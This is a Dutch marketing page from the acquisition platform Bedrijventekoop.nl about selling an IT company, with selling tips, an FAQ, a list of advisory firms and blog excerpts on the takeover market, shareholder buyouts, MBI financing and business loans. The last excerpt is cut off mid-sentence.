ICT bedrijf verkopen

Wil je je IT-bedrijf, softwarebureau of MSP verkopen? Bij Bedrijventekoop.nl komen dagelijks kopers binnen die op zoek zijn naar digitale en technische bedrijven. Je bereikt snel de juiste doelgroep, met landelijke én internationale zichtbaarheid.

Hoe wij je kunnen helpen bij het verkopen van je ICT bedrijf?

Bedrijventekoop.nl is actief sinds 2002. Sinds die tijd hebben wij met ruim 65.000 geregistreerde gebruikers de grootste bedrijfsovernamedatabase van Nederland opgebouwd. Jaarlijks verwelkomen wij ruim 1.000 nieuwe bedrijven ter overname. Via ons platform kom je snel en direct in contact met interessante bedrijven ter overname.

  • In beeld bij 1.000.000 bezoekers per jaar
  • Ruim 65.000 geregistreerde ondernemers en adviseurs
  • Gemiddeld 12 reacties per profiel
  • 45% wordt succesvol verkocht

5 nuttige tips om je bedrijf te verkopen

Tip 1

Begin op tijd. Een bedrijfsovernametraject kan wel 3 tot 5 jaar in beslag nemen. Ga na of je bedrijf verkoopklaar is. Zo niet, maak tijdig de juiste aanpassingen. Zorg bijvoorbeeld dat je bedrijf niet te afhankelijk van jou is.

Tip 2

Bereid je goed voor. Lees je in, zodat je weet wat je te wachten staat. Een bedrijfsovername is een intensief proces. Hoe meer je hierover op de hoogte bent, hoe minder je voor verrassingen komt te staan.

Tip 3

Doe wat je zelf kan doen zelf. Naast een intensief is het ook een kostbaar proces. Om de kosten in de hand te houden, kun je veel dingen zelf doen, zoals bijvoorbeeld het zoeken van een potentiële koper.

Tip 4

Schakel een adviseur in voor specialistische begeleiding. Je kunt veel zelf doen, maar niet alles. Een adviseur laat zich niet leiden door emotie en weet alle ins en outs van het bedrijfsovernametraject.

Tip 5

Bedenk goed wat je hierna gaat doen. Je bent veel van je tijd bezig met je bedrijf. Na de verkoop valt een groot gedeelte hiervan weg, ook als je besluit nog een tijdje aan te blijven. Je hebt daardoor veel tijd over.

Plaats bedrijfsadvertentie

Plaats bedrijfsadvertentie

Ga actief op zoek naar de ideale koper voor je bedrijf. Je advertentie komt anoniem in beeld bij onze 80.000 maandelijkse bezoekers.

Bekijk de mogelijkheden
Wat is mijn bedrijf waard?

Wat is mijn bedrijf waard?

Ben je benieuwd naar de waarde van je bedrijf? Vul dan onze gratis waarderingstool in en ontvang een goede indicatie van je bedrijfswaarde.

Bereken hier de waarde
Whitepaper bedrijf verkopen

Whitepaper bedrijf verkopen

In dit gratis document beschrijven het bedrijfsovernametraject stap voor stap en geven we je praktische tips die je helpen bij de verkoop van je bedrijf.

Download de whitepaper

Hulp nodig? Wij staan voor je klaar!

Ben je benieuwd naar de mogelijkheden van ons platform, heb je een vraag over bedrijfsovername of is iets niet duidelijk? Neem contact met ons op, we staan voor je klaar!

Veelgestelde vragen

Hoe werkt Bedrijventekoop.nl?

Bedrijventekoop.nl is een online platform dat kopers en verkopers van bedrijven op laagdrempelige wijze bij elkaar brengt. Het platform biedt een groot aanbod van bedrijven in diverse sectoren en prijscategorieën. Je kunt eenvoudig een advertentie plaatsen als verkoper of als koper. Geïnteresseerden kunnen gratis reageren op je advertentie en zo kom je direct in contact met de juiste partij. Met 80.000 maandelijkse bezoekers hebben wij het grootste bereik van Nederland.

Hoe verkoop ik mijn bedrijf via Bedrijventekoop.nl?

Je verkoopt je bedrijf door een advertentie te plaatsen met hierin je bedrijfsprofiel. Het bedrijfsprofiel bestaat uit een aantal vaste kenmerken, zoals branche, regio en een tekstuele beschrijving van je bedrijf. Een advertentie is bij ons 100% anoniem. Je contactgegevens worden niet gedeeld en je bedrijfsnaam wordt niet vermeld in de advertentie, ook niet in de tekstuele beschrijving. 

 

De advertentie met je bedrijfprofiel is onderdeel van het pakket 'Bedrijf verkopen'. Naast de advertentie bevat het pakket verschillende informatie- en procesdocumenten, waarmee we je zo goed mogelijk op weg helpen bij het overnametraject. Voordat we je advertentie in onze database plaatsen, nemen deze eerst nog telefonisch met je door, zodat we zeker weten dat alles goed staat.

 

Je bedrijfsprofiel wordt vervolgens eenmaal meegenomen in onze nieuwsbrief die wekelijks naar 25.000 abonnees wordt verstuurd. Het pakket heeft een looptijd van zes maanden en wordt het niet automatisch verlengd. Ook rekenen wij geen succesfee bij een succesvolle verkoop. 

Hoe lang duurt het voordat mijn bedrijf verkocht is?

Deze vraag is lastig te beantwoorden. Dit verschilt namelijk per branche, regio en zelfs per bedrijf. Gemiddeld duurt het zo’n zes tot twaalf maanden voordat een bedrijf verkocht wordt. Hier hebben wij de looptijd van ons pakket dan ook op aangepast. In deze periode ontvangt een advertentie gemiddeld 12 reacties, maar ook dit hangt af van verschillende factoren en is per bedrijf verschillend.

Sinds wanneer is Bedrijventekoop.nl actief?

Bedrijventekoop.nl is opgericht in 2002. Daarmee zijn wij het langstlopende overnameplatform van Nederland. Door de jaren heen hebben wij een groot netwerk opgebouwd en weten alle relevante partijen op het gebied van bedrijfsovernames ons te vinden. Met trots kunnen wij zeggen dat bij inmiddels ruim 15.000 bedrijfsovernames het eerste contact via ons tot stand gekomen is.

Wordt mijn advertentie anoniem geplaatst?

Jazeker, advertenties zijn bij ons 100% anoniem. Ze bevatten geen bedrijfsnaam en je contactgegevens worden niet gedeeld met geïnteresseerde partijen.

Adviseurs

Stichting Kamer van Koophandel Nederland - Turkije

Opgericht door ondernemers, voor ondernemers.

Meer informatie

HKB

HKB is een bedrijfskundig-, overnameadvies & waarderingskantoor voor MKB ondernemers. Wij bieden praktische en deskundige begeleiding aan ondernemers. Op een gestructureerde en toegankelijke manier helpen wij ondernemers met het verhogen van de waarde en later het verkopen van hun bedrijf.

Meer informatie

Adcorporate Noord-Nederland

Adcorporate is een bedrijf van mensen, met mensen en door mensen. Met ervaren overnameadviseurs, die betrokken en deskundig zijn.

Meer informatie

Match Plan Fusies en Overnames

Match Plan is een onafhankelijke overnameadviseur en begeleidt ondernemers bij de koop of verkoop van hun bedrijf. Wij nemen dit volledige traject uit handen en hebben voor ieder onderdeel een eigen specialist in huis.

Meer informatie

MB Adviesgroep

Sinds 1999 zijn wij van MB Adviesgroep actief als adviseur voor ondernemers. Wij zijn onder andere gespecialiseerd in de aan- en verkoopbegeleiding van horeca- en recreatieondernemingen inclusief de financiering van de deal. Daarnaast hebben wij binnen ons team ook fiscaal juristen werkzaam en daarmee bent u ook voor dealoptimalisatie bij ons aan het juiste adres.

Meer informatie

Diligence

Diligence begeleidt als MKB-specialist op discrete en onafhankelijke wijze bedrijfsovernames en fusies, waarvoor het gehele traject van (ver)koopbeslissing tot en met de overdracht bij de notaris verzorgd wordt. Het bedrijf is sinds 1998 actief en heeft meer dan 630 transacties gerealiseerd in een groot aantal branches. De 10 senior overnameadviseurs opereren verspreid over het land, zijn allen zelf ondernemer en beschikken over een groot netwerk in binnen- en buitenland.

Meer informatie

Centrum voor Bedrijfsopvolging

Wij kennen maar één belang en dat is uw belang. Na een grondige kennismaking en een offerte gaan we met u aan het werk. Dat start altijd met een diepgaand vooronderzoek, waarin we alles van u, uw familie, uw bedrijf aan de weet komen.

Meer informatie

Claassen, Moolenbeek & Partners Zuid Holland

Claassen, Moolenbeek & Partners (CM&P) is een onafhankelijk bedrijfskundig en financieel adviesbureau voor een brede groep van ondernemers en ondernemingen.

Meer informatie

Koninklijke Notariële Beroepsorganisatie

De notaris kan u adviseren u over alle aspecten rond uw onderneming of organisatie, zoals het starten van een bedrijf of flex-bv, bedrijfsovername, kiezen van een geschikte rechtsvorm of wijzigingen in het bedrijf.

Meer informatie

Blog

Vraag groeit sterk in Q1 2025: overnamemarkt toont krachtig herstel ten opzichte van vorig jaar
Artikelen en persberichten

Vraag groeit sterk in Q1 2025: overnamemarkt toont krachtig herstel ten opzichte van vorig jaar

De bedrijfsovernamemarkt in het midden- en kleinbedrijf is 2025 sterk begonnen. De vraag naar bedrijven nam in het eerste kwartaal met 10% toe ten opzichte van Q1 2024, waarmee het vertrouwen van kopers verder lijkt te herstellen. Ook het aanbod van bedrijven steeg licht (+3%) vergeleken met dezelfde periode vorig jaar.   De groei is vooral zichtbaar in sectoren met schaalbare verdienmodellen, zoals ICT en non-food retail. In traditionele sectoren zoals transport, agri-food en bouw blijft de activiteit juist achter. Vergeleken met het laatste kwartaal van 2024 is het beeld stabiel – maar in vergelijking met begin vorig jaar is de toegenomen dynamiek onmiskenbaar.   Vraagzijde: duidelijk meer interesse in schaalbare en dienstverlenende bedrijven In vergelijking met Q1 2024 is de vraag in meerdere sectoren flink toegenomen: In de detailhandel non-food steeg de vraag met +57%, vooral dankzij belangstelling voor e-commerce en franchiseconcepten. Ook de ICT-dienstverlening (+11%) en bredere zakelijke dienstverlening (+8%) trokken meer geïnteresseerde kopers. Daartegenover daalde de vraag fors in transport (–39%), agri-food (–27%) en bouw (–20%). Per omzetklasse is de vraag het sterkst toegenomen bij bedrijven met een jaaromzet tussen de €500.000 en €2,5 miljoen. Deze categorieën lieten groeipercentages zien tussen de +15% en +25%. Bij bedrijven met een omzet onder de €250.000 daalde de vraag juist licht.   Vergeleken met het laatste kwartaal van 2024 (Q4) bleef de vraag nagenoeg gelijk (–1%). De toename ten opzichte van een jaar eerder onderstreept dat kopers opnieuw actiever durven zoeken.   Aanbodzijde: lichte stijging, met grote verschillen tussen sectoren Het aanbod van bedrijven op de overnamemarkt was in Q1 2025 3% hoger dan in Q1 2024. Achter dat bescheiden groeicijfer gaan stevige sectorale verschuivingen schuil: Het aanbod in non-food retail nam toe met +39%; met name webwinkels en formules met een vaste klantenbasis zijn vaker verkoopklaar. De grootste stijging werd gezien in ICT-dienstverlening, waar het aantal nieuwe bedrijven dat zich aanbood meer dan verdubbelde ten opzichte van Q1 2024. Ook industrie en dienstverlening zagen een groei in aanbod (beide rond de +15% à +20%). In transport (–75%), bouw (–40%) en agri-food (–33%) nam het aanbod sterk af. Ondernemers lijken hier voorzichtiger met het zetten van een verkoopstap. Kijkend naar omzetgroepen komt de grootste aanbodgroei uit bedrijven met een omzet tussen €1 miljoen en €5 miljoen (+25% tot +40%). Bij de kleinste bedrijven (onder de €100.000 omzet) daalde het aantal nieuwe verkoopprofielen met ruim 30%.   Ten opzichte van Q4 2024 daalde het aanbod licht (–5%). Dat is grotendeels seizoensmatig en past bij het patroon dat januari–maart doorgaans iets rustiger is dan de slotmaanden van het jaar.   Wat valt op? De vergelijking met een jaar eerder laat een duidelijke beweging zien in de overnamemarkt: De vraag groeit weer stevig. Vooral in sectoren waar kopers groei, schaalbaarheid en lage kapitaalsintensiteit zien. Denk aan ICT, zakelijke dienstverlening en online retail. Het aanbod groeit selectief mee. Tech-gedreven bedrijven en het commercieel ingestelde midden van het MKB vormen een steeds groter aandeel van de verkopers. Kleinste bedrijven verliezen terrein. Zowel kopers als verkopers tonen minder activiteit in het segment onder de €250.000 omzet. Kosten spelen een remmende rol in traditionele sectoren. Transport, bouw en agri-food zien zowel minder vraag als minder aanbod, waarschijnlijk door onzekerheid over marges en regelgeving. Vooruitblik De overnamemarkt in het midden- en kleinbedrijf is gezond en in beweging. De stijgende vraag vergeleken met begin 2024 laat zien dat het vertrouwen bij kopers terugkomt. Voor verkopers ligt de sleutel in schaalbaarheid, winstgevendheid en marktpositie.   Bedrijven die opereren in stabiele, schaalbare niches met een omzet tussen €500.000 en €5 miljoen zitten op dit moment in een uitstekende uitgangspositie. In sectoren waar marges onder druk staan, is het zaak eerst intern te optimaliseren voordat de stap naar verkoop wordt gezet.   Zelf een bedrijf kopen of verkopen? Ben je op zoek naar een koper voor je bedrijf? Vind hier alles wat je nodig hebt voor het verkopen van je bedrijf Ben je op zoek naar een geschikt bedrijf ter overname? Vind hier ons actuele aanbod aan bedrijven te koop ...
Lees meer
Openstaande rekeningen bij de uitkoop van een aandeelhouder
Waardering

Openstaande rekeningen bij de uitkoop van een aandeelhouder

Als een aandeelhouder wordt uitgekocht ontstaan er discussies over de prijs van de aandelen. Ook al heeft een onafhankelijke, onpartijdige en ervaren waarderingsdeskundige een waarderingsrapport gemaakt volgens de NiRV richtlijnen, dan nog ontstaat er meestal een stevig debat over de juiste prijs. Waarde is namelijk nog geen prijs. Waarde is gebaseerd op prognoses, toekomstige geldstromen, investeringen en risico’s. Prijs is het resultaat van een onderhandeling.  Je kunt pas uittreden als je over de prijs en alle samenhangende voorwaarden overeenstemming hebt als aandeelhouders. Je moet het eens worden. Het probleem is dat het vertrek van een aandeelhouder meestal niet zomaar ontstaat. De samenwerking is lastig, misschien zelfs onmogelijk geworden. Er worden over en weer verwijten gemaakt en soms is er sprake van een openlijk conflict. Dat conflict keert terug in de hoogte van de vraagprijs. Wat zijn nu die “openstaande rekeningen” die we bij veel prijsdiscussies tegenkomen? Openstaande rekeningen zijn financiële of emotionele claims die de verkoper verrekent in een verhoogde vraagprijs:     Financieel Argumenten Afgesneden van toekomstig rendement Ik krijg een aantal jaren “EBITDA” of winst mee, maar daarna houdt het voor mij op, terwijl de anderen blijven verdienen. Veel meer groei en waarde mogelijk Ik denk dat er in de toekomst nog veel meer omzet, marge en winst gemaakt gaat worden. Gemiste kans op “cashen”   Ik denk dat het bedrijf voor een hele hoge prijs in de toekomst wordt verkocht. Bijdragen niet vertaald in waarde Mijn prestaties voor deze onderneming komen niet voldoende tot uitdrukking in de waarde. Ik zou een groter deel moeten ontvangen. Concurrentiebeding Omdat ik niet in deze sector actief mag zijn voor 2-3 jaar, kan ik geen inkomen verdienen. Ik moet daarom een groter bedrag ontvangen om die periode te overbruggen. Startkapitaal nodig Ik heb een startkapitaal nodig om een nieuwe onderneming te starten. Waarde te laag ingeschat De waarde is te laag ingeschat omdat de prognose te laag en de risico’s te hoog zijn ingeschat. Ik vind dat de economische omstandigheden te somber zijn ingeschat. Schade Ik heb schade geleden doordat ik ben tegengewerkt en omdat de andere aandeelhouders de waarde hebben gedrukt. Zij hebben verkeerde strategische keuzes gemaakt, slechte investeringen gedaan of zichzelf teveel beloond. Dividend   Ik heb nooit dividend of ik heb te weinig dividend ontvangen, terwijl er meer dan genoeg cash in de onderneming was. Uittreding Bij een uittredingsprocedure (artikel 2:343 BW) bepaalt de rechter de prijs van de aandelen aan de hand van een waardebepaling. Als ik niet een betere prijs krijg, ga ik naar de Ondernemingskamer om uittreding te vorderen.     Emotioneel Argumenten Niet gezien, niet gewaardeerd Ik voel mij niet gezien, niet begrepen en niet gewaardeerd. Ik heb veel voor de onderneming betekend maar nooit de eer of de waardering hiervoor ontvangen. Harder gewerkt, meer bijgedragen Ik heb veel harder gewerkt dan de andere directeuren-bestuurders-managers en veel meer bijgedragen aan het resultaat. Ik verdien een premie of een “bonus”. Dwars gezeten, samenzwering De andere aandeelhouders hebben mij structureel dwarsgezeten en tegengewerkt. Zij werkten actief samen om mij eruit te werken. Er is een complot tegen mij. Onterecht ontslagen Ik ben op volstrekt onterechte gronden ontslagen of eruit gezet. Ik heb niets verkeerds gedaan en ik ben mijn werk en mijn toekomst kwijt.  Het was mijn idee, mijn initiatief Ik heb ooit het idee gehad om dit te starten, ik heb ooit de aandeelhouders bij elkaar gehaald, ik heb ooit het geld gestort om te starten. Zonder mij was deze onderneming er nooit geweest. Slachtoffer compensatie Ik ben slachtoffer van manipulaties, leugens en bedrog door de anderen. Ik verdien een compensatie voor mijn leed. Reputatie   Mijn reputatie is door dit vertrek beschadigd. De hele sector weet dat ik eruit ben gezet. Ik kom nergens meer aan de bak. Het gevolg van openstaande rekeningen is dat onderhandelingen eindeloos duren en vaak eindigen in een dure, rechterlijke procedure. Zakelijke mediation kan een dergelijke escalatie voorkomen. In mediation komen juist alle openstaande rekeningen als eerste aan bod, omdat die de normale prijsonderhandeling frustreren. Door intensieve intakes en gerichte interventies proberen mediators alle emotionele “angels” uit het proces te halen. In vier van de vijf mediations lukt het om alsnog tot een evenwichtige deal te komen.  Alexander Thomassen Instituut voor Zakelijke Mediation   ...
Lees meer
Bedrijf klaar voor verkoop? Dan moet dit eerst op orde zijn
Overig

Bedrijf klaar voor verkoop? Dan moet dit eerst op orde zijn

Het besluit om je bedrijf te verkopen is geen kleintje. Je hebt er jarenlang je ziel en zaligheid in gestoken—nu wil je natuurlijk dat die inzet ook goed wordt beloond. Een goede voorbereiding is daarom essentieel. Je bedrijf verkoopklaar maken betekent dat je ervoor zorgt dat alles klopt: van de cijfers tot de uitstraling. Zorg voor overzichtelijke processen, een up-to-date klantenbestand, duidelijke contracten en een sterke online aanwezigheid. Kopers zoeken niet alleen naar winst, maar ook naar zekerheid en stabiliteit. Een goed georganiseerd bedrijf wekt vertrouwen—en dat vertaalt zich in een betere verkooppositie én prijs.   Zorg ervoor dat al het papierwerk goed is geregeld Bij een bedrijfsoverdracht draait het niet alleen om een stevig handdrukmoment aan het einde. Het administratieve en juridische papierwerk vormt de ruggengraat van het verkoopproces. Denk aan jaarrekeningen, arbeidscontracten, huur- of leaseovereenkomsten, leverancierscontracten, IP-rechten en eigendomsdocumenten. Alles moet kloppen én makkelijk terug te vinden zijn. Door deze documenten netjes te verzamelen en op orde te brengen, voorkom je onnodige vertragingen of afhaakmomenten bij geïnteresseerde kopers. Een gestructureerde administratie laat zien dat je grip hebt op je onderneming—en dat is voor elke potentiële koper goud waard.   Ga voor een fijne transitie, helemaal als er personeel bij betrokken is Als er medewerkers betrokken zijn bij je bedrijf, is het belangrijk om aandacht te besteden aan een soepele en respectvolle overgang. Voor jou is het een zakelijke beslissing, maar voor je team kan het voelen als een schok of onzekerheid. Houd je medewerkers tijdig op de hoogte, zorg ervoor dat de beroepsaansprakelijkheidsverzekering goed geregeld is en betrek ze waar mogelijk in het proces. Een transparante communicatie voorkomt onrust én behoudt de motivatie binnen het team. Idealiter stel je samen met de koper een transitieplan op, waarin zaken als overname van personeel, communicatie en toekomstige werkstructuur duidelijk zijn uitgewerkt.   Stel een realistisch plan voor jezelf op De verkoop van je bedrijf is een belangrijke mijlpaal—maar wat komt er daarna? Of je nu gaat genieten van een welverdiend sabbatical, wil investeren in een nieuw avontuur, of juist langzaam wilt afbouwen: stel een realistisch plan voor jezelf op. Dit helpt je om gefocust te blijven tijdens de verkoop én voorkomt dat je na de overdracht in een gat valt. Denk na over je financiële situatie, je tijdsbesteding en je persoonlijke doelen. Wat wil je bereiken in het jaar na de verkoop? Door hier vooraf goed over na te denken, geef je jezelf rust én richting.   Schakel een expert in tijdens de verkoop De verkoop van een bedrijf is een complex proces, met juridische, fiscale én emotionele haken en ogen. Het loont dan ook om een expert in te schakelen die je hierbij begeleidt. Denk aan een overname adviseur, accountant, fiscalist of jurist met ervaring in bedrijfsverkoop. Zij weten precies waar op te letten en kunnen onderhandelen met kopers, documenten controleren en adviseren over de waardebepaling van je bedrijf. Zo voorkom je dat je belangrijke zaken over het hoofd ziet—en kun jij je richten op de grote lijnen, met een gerust hart.   Denk ook na over het emotionele aspect van de verkoop Een bedrijf verkopen is méér dan een zakelijke transactie. Je neemt afscheid van iets dat je zelf hebt opgebouwd, met vallen en opstaan. Dat kan onverwachte emoties oproepen: trots, opluchting, twijfel of zelfs rouw. Gun jezelf de tijd om deze gevoelens te erkennen. Misschien helpt het om met andere ondernemers te praten die dit proces al hebben doorlopen. Of neem bewust een moment om stil te staan bij wat je hebt bereikt. Want hoe rationeel je het ook aanpakt, een beetje gevoel hoort er gewoon bij. ...
Lees meer
Op overnamepad als MBI-kandidaat? Zó haal je het maximale uit je financiering
Financiering

Op overnamepad als MBI-kandidaat? Zó haal je het maximale uit je financiering

Je hebt een bedrijf op het oog dat perfect past bij jouw ambitie en ervaring. Je hebt gesprekken gevoerd met de verkoper, er ligt een intentieverklaring en de contouren van de deal beginnen zich af te tekenen. Spannende tijden — maar nu komt één van de belangrijkste fases: de financiering rond krijgen.    Voor veel MBI-kandidaten is dit het punt waar mogelijk kansen gemist worden. Niet omdat de overname geen potentie heeft, maar omdat het financieringsproces niet optimaal wordt aangepakt. In deze blog legt onze partner NLInvesteert uit waar je als MBI-kandidaat op moet letten, en hoe je met een slimme aanpak – inclusief stapelfinanciering – méér mogelijk maakt. 1. Een goede voorbereiding is het halve werk Financiers kijken niet alleen naar het bedrijf dat je wilt overnemen, maar ook naar jóu als ondernemer. Heb je de juiste ervaring? Past deze onderneming bij jouw profiel? Hoe ziet het plan eruit voor de eerste jaren na overname? Een financieringsmemorandum (of investeringsplan) is essentieel en moet onder meer bevatten: Een duidelijke beschrijving van het over te nemen bedrijf: activiteiten, marktpositie, klanten, leveranciers. De rationale achter de overname: waarom dit bedrijf, waarom nu? Jouw profiel als MBI’er: ervaring, skills, trackrecord. De structuur van de deal: koopsom, earn-outs, vendor loan. Een gedegen financiële prognose: inclusief kasstromen, rentabiliteits- en balansontwikkeling en verschillende scenario’s (best case, base case, worst case). De waardering van het over te nemen bedrijf.  De gewenste financieringsstructuur. De continuïteit van de onderneming na overname gericht op klantenportefeuille, aanblijven sleutelfiguren en leveranciers. Een goed plan zorgt niet alleen voor een betere kans op financiering, maar geeft financiers ook vertrouwen dat jij weet waar je aan begint.   2. Eén financier benaderen? Dat is vragen om tijdverlies Een veelgemaakte fout: het plan naar één bank sturen, daar wekenlang mee in gesprek gaan en dan pas ontdekken dat het niet past binnen hun kaders. Kostbare tijd gaat verloren, terwijl de verkoper doorgaans op voortgang rekent. De realiteit is dat financiers allemaal net iets anders naar risico’s en structuren kijken. Wat bij de ene bank niet past, kan bij een alternatieve financier wél mogelijk zijn. Of juist in de combinatie tussen deze partijen mogelijk zijn. Denk aan: Banken die relatief conservatief zijn met overnames door MBI’ers. Financiers die niet of slechts een deel van de goodwill financiering willen faciliteren. Non-bancaire financiers die soepeler omgaan met solvabiliteitsverhoudingen en zekerheden. Door meerdere financiers parallel te benaderen voorkom je tijdverlies én vergroot je de kans op een goede deal. Als er meerdere financiers tot financiering willen overgaan verbetert dat je onderhandelingspositie.   3. Maak gebruik van stapelfinanciering In veel overnamecases zien we dat één financier niet het hele plaatje kan (of wil) invullen. Dat betekent niet dat de deal niet rondkomt — maar dat stapeling van financiering een oplossing biedt.   Een typische overnamefinanciering kan als volgt worden opgebouwd: Senior lening van een bank: Vaak de grootste component, met eerste zekerheden op activa. Tot een bepaald percentage van de koopsom, afhankelijk van kasstroom, zekerheden en het maximaal te financieren bedrag t.o.v. EBITDA.  Junior lening van een non-bancaire financier: Deze financier neemt meer risico en wordt eventueel achtergesteld aan de bank. Denk hierbij aan partijen die kijken naar ondernemerschap en cashflow in plaats van onderpand. Op basis hiervan wordt een tweede pandrecht op activa achter de bank geaccepteerd. Logischerwijs rekent deze partij wel een hogere rente dan bancair wordt aangeboden. Vendor loan (verkoperslening): Een veel toegepaste vorm van aanvullende financiering waarbij de verkoper een deel van de koopsom achterlaat in de vorm van een lening. Dit is gunstig voor het vertrouwen van financiers en voor de liquiditeitspositie na overname. Eigen inbreng van de MBI-kandidaat: Afhankelijk van de totale dealstructuur en het risicoprofiel, vragen financiers vaak om een eigen inbreng van 10% tot 30%.   4. Begin op tijd met het financieringsproces Het lijkt een open deur, maar toch gaat het vaak mis: de intentieverklaring wordt getekend, due diligence wordt gestart, en pas daarna begint het financieringsproces. Terwijl juist die fase bedoeld is om zekerheden in te bouwen. Zorg dat je de financieringsaanvraag op tijd opstart, in ieder geval direct na het tekenen van de intentieverklaring (met inachtneming van een financieringsvoorbehoud). Of laat je voorafgaand aan een aankoopproces al informeren over de mogelijkheden voor financiering. Zo voorkom je: Vertraging omdat financiering toch niet haalbaar blijkt. Heronderhandeling van voorwaarden met de verkoper. Onnodige juridische en DD-kosten zonder zekerheid.   5. Wil je snelheid én de beste deal? Laat je begeleiden Het financieringslandschap voor overnames is breed en versnipperd. De juiste partij vinden, de juiste structuur opzetten, en zorgen dat alle betrokkenen op het juiste moment kunnen schakelen – dat vraagt ervaring én een netwerk. Goede begeleiding zorgt voor: De juiste voorbereiding van je plan en het beoordelen van je financiële prognoses. Toegang tot een netwerk van een grote diversiteit aan financiers. Structurering van stapelfinancieringen. Hierbij kunnen we ook putten uit de financieringsbronnen die NLInvesteert ter beschikking stelt (fondsen en het investeringsplatform).  Onderhandeling van condities. Begeleiding tot en met passeren bij de notaris. Of je nu een productiebedrijf, een handelsorganisatie of een IT-bedrijf op het oog hebt — met de juiste aanpak is er vaak meer mogelijk dan je denkt. Maar dan moet het proces wél professioneel worden aangepakt.   Wim Burger NLInvesteert West-Brabant ...
Lees meer
In gesprek met Edward Ooteman – ED-M Partners
Artikelen en persberichten

In gesprek met Edward Ooteman – ED-M Partners

Van tijd tot tijd gaan wij in gesprek met een van onze aangesloten partners om hen wat beter te leren kennen. Dit keer is het de beurt aan Edward Ooteman van ED-M Partners. Wij spraken hem over zijn organisatie en vroegen hem naar zijn kijk op de overnamemarkt. Edward is vrijwel zijn gehele werkzame leven actief als ondernemer. Hij had onder meer een recruitmentbedrijf en richtte twee IT-consultancybedrijven op. Daarna werkte hij zes jaar lang als partner bij Boer & Croon en nam hij samen met een zakenpartner een tandheelkundige keten over, die ze later weer succesvol verkochten. ED-M Partners Een aantal jaren geleden besloot hij, na dertig jaar ondernemerschap en meerdere succesvolle bedrijfsovernames en -exits, dat het tijd was om zijn opgedane ervaring te benutten als overnameadviseur. "Mijn ervaringen als zowel koper als verkoper van bedrijven maakten mij enthousiast om ook andere ondernemers te helpen bij overnames," vertelt hij. "Daarom ben ik ED-M Partners gestart." Vanuit zijn woonplaats Bergen (NH) begeleidt hij ondernemers bij aan- en verkoop van bedrijven. Hij onderscheidt zich hierin met zijn persoonlijke en betrokken werkwijze. "Bij grote advieskantoren zie je vaak dat de partners het eerste contact doen, waarna een junior de begeleiding overneemt. Ik kies ervoor om zelf het hele traject van A tot Z te begeleiden. Van de eerste gesprekken tot aan de notaris, ik ben erbij. Uiteraard wordt ik op de juiste momenten ondersteund door een bedrijfsanalist, maar dat persoonlijke aspect vind ik heel belangrijk."  ...
Lees meer
Zo leen je slim voor de groei van je onderneming
Financiering

Zo leen je slim voor de groei van je onderneming

Als ondernemer kan het nodig zijn om geld te lenen. Je wilt bijvoorbeeld investeren in nieuwe apparatuur, maar hebt hier niet de financiële middelen voor. Of je wil extra voorraad aanschaffen, terwijl alle openstaande facturen nog niet betaald zijn. Juist bij zulke knelpunten is het fijn om wat geld achter de hand te hebben. Dit kan in de vorm van een lening, maar daarbij is het wel van belang om te weten dat geld lenen als ondernemer anders werkt dan een persoonlijke lening. Zorg dat je weet welke lening voor jou de beste oplossing is, want alleen zo leen je slim voor de groei van je onderneming. Waarom geld lenen als ondernemer? Wanneer je drie verschillende ondernemers vraagt waarom ze geld lenen, is de kans groot dat je drie verschillende antwoorden krijgt. Toch is investering in groei wel een veel genoemde, omdat deze op allerlei manieren kan plaatsvinden. Je kunt bijvoorbeeld groeien door je bedrijf uit te breiden of door een nieuwe vestiging te openen. De uitbreiding kan echter ook zitten in de aanschaf van extra machines, waardoor je productiecapaciteit groter wordt. Ook het verkrijgen van werkkapitaal kan een reden zijn om geld te lenen. Dat helpt om tijdelijk een liquiditeitstekort te overbruggen, of om lopende kosten te dekken. Wil je je voorraad uitbreiden, zonder daarvoor direct je eigen kapitaal aan te spreken? Ook dat kan een reden zijn om geld te lenen. Een ander moment waarop extra geld nodig kan zijn, is wanneer je een bestaande onderneming wilt overnemen, of een franchise wilt starten. De verschillende soorten zakelijke financiering Als ondernemer kun je niet alleen verschillende redenen hebben om geld te willen lenen, maar ook kiezen uit verschillende soorten zakelijke financiering. Het is belangrijk om de optie te kiezen die het beste bij jouw situatie past. Om dat goed te kunnen doen is het handig om wat te weten van de verschillende financieringsvormen. Verreweg de bekendste is de zakelijke lening. Dit is een vast bedrag dat je in termijnen terugbetaalt, met rente. Zo’n lening is geschikt voor grote investeringen. Ben je op zoek naar meer flexibiliteit? Dan kan een zakelijk krediet een betere keuze zijn. Bij deze flexibele leenvorm betaal je alleen rente over het opgenomen bedrag. Andere vormen van zakelijke financiering Naast het zakelijke krediet en de zakelijke lening zijn er andere opties die je kunt gebruiken om extra middelen tot je beschikking te krijgen. Leasing is daarvan een veel gebruikte. Hierbij betaal je maandelijks een bedrag, in plaats van dat je in een keer een grote uitgave moet doen. Deze vorm wordt veel gebruikt bij bedrijfsmiddelen zoals auto’s en machines. Wat minder bekend is factoring: een financieringsvorm waarbij je facturen direct betaald krijgt door een factoringmaatschappij. Dit helpt bij cashflowproblemen, doordat je niet meer op je geld hoeft te wachten. Een andere minder traditionele financieringsvorm is crowdfunding. Daarbij investeren particulieren of bedrijven in jouw onderneming of product. Hiervoor kun je online diverse platforms vinden. Ten slotte is het ook goed om te weten dat je voor overheidsregelingen in aanmerking kan komen als je een onderneming start vanuit een uitkering. Het starterskrediet van het UWV kan dan bijvoorbeeld een uitkomst zijn. Waar moet je op letten bij een zakelijke lening? Overweeg je het afsluiten van een zakelijke lening. Onderzoek dan eerst de volgende zaken: Het rentepercentage van de lening. De koste van de lening kunnen namelijk flink verschillen per aanbieder; De looptijd. Over het algemeen geldt: hoe langer de looptijd, hoe lager de maandlasten. Dat lijkt aantrekkelijk, maar hoeft niet altijd voordelig te zijn. De totale kosten zullen hierdoor namelijk vaak hoger uitvallen; Lees alle voorwaarden goed door voordat je een overeenkomst aangaat. In de voorwaarden vind je bijvoorbeeld terug of je een boete krijgt als je vervroegd aflost, of dat je vastzit aan verplichte aflossingen; Houd er rekening mee dat er om een onderpand gevraagd kan worden. Als je de lening op termijn niet meer kunt betalen, kan dat dus vervelende gevolgen hebben; Stel jezelf de vraag of je financiële situatie stabiel genoeg is om de lasten van een lening te kunnen blijven dragen. Hoe vraag je een lening aan? Om succesvol een zakelijke lening aan te vragen, is het belangrijk om goed voorbereid zijn. Dat kun je doen door een sterk ondernemingsplan te schrijven, waarin je uitlegt wat je plannen zijn en hoe je die gaat realiseren. Voor kredietverstrekkers maakt dit duidelijk wat je plan is om winst te maken en daarmee je maandelijkse kredietlasten kunt 